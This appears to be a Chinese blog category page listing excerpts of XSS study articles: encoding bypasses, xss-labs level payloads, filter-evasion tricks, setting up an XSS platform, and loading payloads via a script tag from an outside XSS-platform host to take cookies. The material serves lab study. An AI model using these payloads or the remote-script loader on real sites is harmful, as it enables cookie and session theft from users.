
XSS
文章平均质量分 59
樱浅沐冰
我并不是无所不知哦,只知道我知道的事情。知道得越多,就越是有更多不知道的事情。
展开
-
XSS编码问题
wooyun%26%23x27,alert(1)%2b%26%23x27由于页面对单引号 & 符号 以及 #符号过滤!但是html中可以识别html实体编码!但是实体编码是由&#组成!这个时候&#已经被过滤 我们只能通过url编码来对 & # 两个符号进行编码!再让浏览器解码成 &# 然后拼接x27 最后就成为了单引号的html16进制编码!解码后:我们的提交值为:',alert(1)'二HTML 编码十进制和十六进制编码的分号是可以去掉的html编码原创 2021-07-07 10:43:50 · 510 阅读 · 0 评论 -
干货 | xss攻击、绕过_超级总结
简述XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBScript,ActiveX,Flash或者甚至是普通的HTML。攻击成功后,攻击者可能得到更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。常用的XSS攻击手段和目的1.盗用cookie,获取敏感信息。2.利用植入Flash,通过crossdomain权限设置进一步原创 2021-06-26 00:28:43 · 1468 阅读 · 1 评论 -
XSS学习总结21篇
所有的文章都是看源码分析的,但是我这里推荐用抓包工具看输出这里我要补充一下xss的相关知识(这里非常非常重要,如果连这些都不知道,是很难做xss的)一、html标签里可以继续写html标签<p>giegie,我你男朋友不会揍我吧<script>alert(1)</script></p>二、html元素的属性可以触发事件(https://www.runoob.com/html/html-attributes.html)HTML 属性HTML 元素可原创 2021-06-18 16:32:33 · 721 阅读 · 0 评论 -
xss_labs靶场_1~20关练习
在开始前,先了解一下前段小知识javascript事件(onclick/onmouseover/onmouseout等)楼主自己用的payloadlevel1 <script>alert(1)</script>level2"><script>alert(1)</script>//level3' onclick=alert(1)//level4" onclick=alert(1) //level5"> <a href=javasc原创 2021-06-06 23:40:36 · 797 阅读 · 5 评论 -
【复习】XSS_04_加载payload
xss加载payload当我们在测试xss漏洞的时候,一般都是用h1 alert 简单的html标签 样式是否改变 是否弹出框,来检验是否存在xss漏洞。当在利用这个xss漏洞获取信息的时候,就要加载payload,加载payload的方法多种多样,以下是常用的加载技巧。有一些 xss平台已经有一些通用的方法。直接拿到用就可以了。1、标准script加载<script src=http://www.xs.sb.com/amER></script><script s原创 2021-05-22 21:39:34 · 470 阅读 · 0 评论 -
【复习】XSS_03_绕过技巧
xss的绕过技巧1、大小写绕过http://target_sys.com/xss/xss04.php?name=<Script>alert(1);</Script>2、属性多余http://target_sys.com/xss/xss05.php?name=<script<script>>alert(1);</sc</script>ript>3、转换标签http://target_sys.com/xss/xss06.php?原创 2021-05-22 18:19:21 · 805 阅读 · 7 评论 -
【复习】XSS_02_平台搭建与利用
XSS平台源码一、安装其他模块XSS module(模块一) 修改域名之后导入数据库二、创建XSS平台代码三、加载payload原创 2021-05-22 16:32:04 · 211 阅读 · 0 评论 -
【复习】XSS的种类和本地读取cookie
xss类型:反射:难以利用,所以危害低,但是会与后台交互,利用好话可以实现高危存储:与后台交互,将恶意代码插入数据库,用户访问网页,会读取数据库内容,就会执行恶意代码,高危Dom :算是反射型的一种,不会与后台进行交互,利用的document节点进行配合实现漏洞触发(doom型是利用document节点进行动态交互,产生xss)默认火狐是不能执行这种domxss因为火狐会把urd上面的字符串进行编码在ie里面默认不编码但是要关闭XxSS过滤器方可执行实操(搭建本地xss平台)原创 2021-05-22 15:26:45 · 351 阅读 · 0 评论